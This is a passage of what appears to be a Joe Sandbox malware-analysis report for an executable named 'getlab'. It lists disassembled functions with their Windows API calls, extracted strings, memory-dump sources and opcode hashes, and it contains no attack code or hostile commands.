                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: NotifyWinEvent$user32.dll
                                                                          • API String ID: 1646373207-597752486
                                                                          • Opcode ID: c1ce619e6872abdf5b4899d5f27880f5dd90b76e17064dac08d73993ed60d4d7
                                                                          • Instruction ID: 704f9416b83fe6db864644e5aa21ade638d5456887e5d0d6230baff76c02d14e
                                                                          • Opcode Fuzzy Hash: c1ce619e6872abdf5b4899d5f27880f5dd90b76e17064dac08d73993ed60d4d7
                                                                          • Instruction Fuzzy Hash: 7DE012F0E4174499FB00BBB97A4671E3AD0E7A471CB00017FF454A62A1DB7C44184F9D
                                                                          Function 00497E74 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                          • API String ID: 1646373207-834958232
                                                                          • Opcode ID: d26faf3502760f2b8304c8b29f1b377702d6f34381249b52cb9d82fc0845b7a8
                                                                          • Instruction ID: a447a91dd4d4791f70ca82ece540bd513dbb2543541ea1319c0fea98b289aaf7
                                                                          • Opcode Fuzzy Hash: d26faf3502760f2b8304c8b29f1b377702d6f34381249b52cb9d82fc0845b7a8
                                                                          • Instruction Fuzzy Hash: 61B09280668712549C0032F30C02B2B0C094840728B1000B73414A00C6CE6C9C004A3D
                                                                          Function 0046441C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0044B650: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                                          • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                                          • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                          • API String ID: 2238633743-2683653824
                                                                          • Opcode ID: 25a4dc9541e494d4f478376088f4118d6a1224d0a714e6d5fca985b35bc39c4d
                                                                          • Instruction ID: 48aea337371b5dbca44804c24081d1198016d0c57ab59c55e23a700f58ea278e
                                                                          • Opcode Fuzzy Hash: 25a4dc9541e494d4f478376088f4118d6a1224d0a714e6d5fca985b35bc39c4d
                                                                          • Instruction Fuzzy Hash: 89B092A0640705A8CD047BB21857B0F2A4494A0B18790423B301475083EF7C88205A5E
                                                                          Function 0047CE60 Relevance: 6.2, APIs: 4, Instructions: 195fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238), ref: 0047CFB0
                                                                          • FindClose.KERNEL32(000000FF,0047CFDB,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238,00000000), ref: 0047CFCE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID:
                                                                          • API String ID: 2066263336-0
                                                                          • Opcode ID: 9f09813f7918e7f3537418bbdf228f62d8dd8a495373f8467bf1863306f2bb6d
                                                                          • Instruction ID: d4706787225a87a8d466f388a3eb94f1c6a992d4ef98e923761ffbb9731f628b
                                                                          • Opcode Fuzzy Hash: 9f09813f7918e7f3537418bbdf228f62d8dd8a495373f8467bf1863306f2bb6d
                                                                          • Instruction Fuzzy Hash: 32814B70D0024DAFCF11DF95CC91ADFBBB9EF49308F5080AAE808A7291D6399A46CF55
                                                                          Function 00475394 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042EE28: GetTickCount.KERNEL32 ref: 0042EE2E
                                                                            • Part of subcall function 0042EC80: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECB5
                                                                          • GetLastError.KERNEL32(00000000,00475509,?,?,0049C1D0,00000000), ref: 004753F2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CountErrorFileLastMoveTick
                                                                          • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                          • API String ID: 2406187244-2685451598
                                                                          • Opcode ID: 7dd558b458d748696a875524af4e195e3f09e273ab8622730eb0a1e32a8ceb2d
                                                                          • Instruction ID: 7c456f6db07972d04682c0112793eede51d985a58d5564732b5c120557be107c
                                                                          • Opcode Fuzzy Hash: 7dd558b458d748696a875524af4e195e3f09e273ab8622730eb0a1e32a8ceb2d
                                                                          • Instruction Fuzzy Hash: 5D419670A006099BCB10EFA5D882ADF77B5EF48314F608537E404BB355E7B89E458BAD
                                                                          Function 00413CF0 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00413D3E
                                                                          • GetDesktopWindow.USER32 ref: 00413DF6
                                                                            • Part of subcall function 00418EB8: 6F59C6F0.COMCTL32(?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418ED4
                                                                            • Part of subcall function 00418EB8: ShowCursor.USER32(00000001,?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418EF1
                                                                          • SetCursor.USER32(00000000,?,?,?,?,00413AEB,00000000,00413AFE), ref: 00413E34
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CursorDesktopWindow$Show
                                                                          • String ID:
                                                                          • API String ID: 2074268717-0
                                                                          • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                          • Instruction ID: 9b0def8c9c64a2c96ee02a3ab3d0705208e3fbe4449c9c566199a376d490666d
                                                                          • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                          • Instruction Fuzzy Hash: D2411931600210AFC710DF2AFA84B5677A5EB69329B16807BE405CB365DB38ED81CF9C
                                                                          Function 00408A44 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A65
                                                                          • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AD4
                                                                          • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B6F
                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BAE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString$FileMessageModuleName
                                                                          • String ID:
                                                                          • API String ID: 704749118-0
                                                                          • Opcode ID: 6e4d3cb753bdbb9908acc8cdd2b86980fc3448728ff30d06669c4a0ffee8011d
                                                                          • Instruction ID: 89cba0e7522a9b83fcc2071cfb28f1965358b02fab5b9b8693395207a1b0bde5
                                                                          • Opcode Fuzzy Hash: 6e4d3cb753bdbb9908acc8cdd2b86980fc3448728ff30d06669c4a0ffee8011d
                                                                          • Instruction Fuzzy Hash: A63110716083809AD330EB65CA45B9FB7D8AB85704F44483FB6C8E72D1DB7899048B6B
                                                                          Function 0044E8BC Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E905
                                                                            • Part of subcall function 0044CF48: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF7A
                                                                          • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E989
                                                                            • Part of subcall function 0042BBAC: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC0
                                                                          • IsRectEmpty.USER32(?), ref: 0044E94B
                                                                          • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E96E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                          • String ID:
                                                                          • API String ID: 855768636-0
                                                                          • Opcode ID: 0b47e4e74fbaa274a2738fa508d6e527e1083de5c38dc3a313e3f8e812d9ff7d
                                                                          • Instruction ID: fae584cc962e85b422f7b584321c3529105593e75d7f1ff9ae22b75d4be52dd2
                                                                          • Opcode Fuzzy Hash: 0b47e4e74fbaa274a2738fa508d6e527e1083de5c38dc3a313e3f8e812d9ff7d
                                                                          • Instruction Fuzzy Hash: F1116A71B4030067E610BA3A8C86B5B76C99B98748F15093FB505EB3C2DE7DDC0983A9
                                                                          Function 00494E30 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OffsetRect.USER32(?,?,00000000), ref: 00494E94
                                                                          • OffsetRect.USER32(?,00000000,?), ref: 00494EAF
                                                                          • OffsetRect.USER32(?,?,00000000), ref: 00494EC9
                                                                          • OffsetRect.USER32(?,00000000,?), ref: 00494EE4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: OffsetRect
                                                                          • String ID:
                                                                          • API String ID: 177026234-0
                                                                          • Opcode ID: 6561eb4d383449756189e8e73bad2b2324663fde54b6a94536ab2f09e4d2584d
                                                                          • Instruction ID: 1704218a4531d37ac2ab58ce54688b95f7f5c665c469e7ed4027bbe581d59bf2
                                                                          • Opcode Fuzzy Hash: 6561eb4d383449756189e8e73bad2b2324663fde54b6a94536ab2f09e4d2584d
                                                                          • Instruction Fuzzy Hash: C42190BA704201AFCB00DE69CD85E6BB7DAEFC4340F148A3AF944C7249E638ED058755
                                                                          Function 00417210 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32 ref: 00417258
                                                                          • SetCursor.USER32(00000000), ref: 0041729B
                                                                          • GetLastActivePopup.USER32(?), ref: 004172C5
                                                                          • GetForegroundWindow.USER32(?), ref: 004172CC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                          • String ID:
                                                                          • API String ID: 1959210111-0
                                                                          • Opcode ID: 7e2e89ac6d78113517a7cdb08ff1bb3a8e6934fc8f6f5a4bd5de53d8afa5f26a
                                                                          • Instruction ID: d8f212eab659ab8611038d963e52f28b2b0f2619fe8d71a0b25c9b868ff876e9
                                                                          • Opcode Fuzzy Hash: 7e2e89ac6d78113517a7cdb08ff1bb3a8e6934fc8f6f5a4bd5de53d8afa5f26a
                                                                          • Instruction Fuzzy Hash: B121B0303486008AC710AB69D944AEB33F1EF58724B1145BBF8459B392DB3DDC82CB8D
                                                                          Function 00494AE8 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494AFD
                                                                          • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494B11
                                                                          • MulDiv.KERNEL32(F70A2BE8,00000008,?), ref: 00494B25
                                                                          • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00494B43
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
                                                                          • Instruction ID: 4e21b8649f01b029d01931fbc34569bb41b57a17a8c4fb2cd57aac9c741bb68b
                                                                          • Opcode Fuzzy Hash: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
                                                                          • Instruction Fuzzy Hash: 1F113072605104AFCF40DFA9C8C5E9B7BECEF8D320B1541AAF908DB246D634ED418B68
                                                                          Function 0041F478 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,0041F468,?), ref: 0041F499
                                                                          • UnregisterClassA.USER32(0041F468,00400000), ref: 0041F4C2
                                                                          • RegisterClassA.USER32(00499598), ref: 0041F4CC
                                                                          • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F507
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                          • String ID:
                                                                          • API String ID: 4025006896-0
                                                                          • Opcode ID: 369d2da58285a6866fdf7dc2e280d06892b8d6024adb0aca680e52ce00aa00df
                                                                          • Instruction ID: e4d668e9dca91fd32e585eae6d60143d6dfbdf42e70c096e3b85bfad9ab1786c
                                                                          • Opcode Fuzzy Hash: 369d2da58285a6866fdf7dc2e280d06892b8d6024adb0aca680e52ce00aa00df
                                                                          • Instruction Fuzzy Hash: 63016D722001046BDB10EBACED81E9B3798A729314B10423FBA15E73A2D7399D458BAC
                                                                          Function 0040D1F8 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D20F
                                                                          • LoadResource.KERNEL32(00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C,0000000A,00000000), ref: 0040D229
                                                                          • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C), ref: 0040D243
                                                                          • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?), ref: 0040D24D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                          • String ID:
                                                                          • API String ID: 3473537107-0
                                                                          • Opcode ID: 0bf80b66a5ada5cede639d51b96412ae59566757451319f02a49a05eb7d51380
                                                                          • Instruction ID: 3283e33870439dafd25d8e1e147512606e62b5bf6a0133693b61d2317928fdf1
                                                                          • Opcode Fuzzy Hash: 0bf80b66a5ada5cede639d51b96412ae59566757451319f02a49a05eb7d51380
                                                                          • Instruction Fuzzy Hash: C5F04FB26056047F8B04EE99A881D5B77DDDE88264314027EF908EB242DA38DD018B69
                                                                          Function 00401548 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,=Y,?,?,?,004018B4), ref: 00401566
                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,=Y,?,?,?,004018B4), ref: 0040158B
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,=Y,?,?,?,004018B4), ref: 004015B1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$Alloc$Free
                                                                          • String ID: =Y
                                                                          • API String ID: 3668210933-2624468338
                                                                          • Opcode ID: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                          • Instruction ID: ed10fda1d5a177d2a0c43996bc0be7fa2989f050302610c9045c0a13ae1d279a
                                                                          • Opcode Fuzzy Hash: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                          • Instruction Fuzzy Hash: AFF0C8716403206AEB315A294C85F133AD4DBC5754F104075BE09FF3DAD6B8980082AC
                                                                          Function 004703C0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 00470411
                                                                          Strings
                                                                          • Unsetting NTFS compression on file: %s, xrefs: 004703F7
                                                                          • Failed to set NTFS compression state (%d)., xrefs: 00470422
                                                                          • Setting NTFS compression on file: %s, xrefs: 004703DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
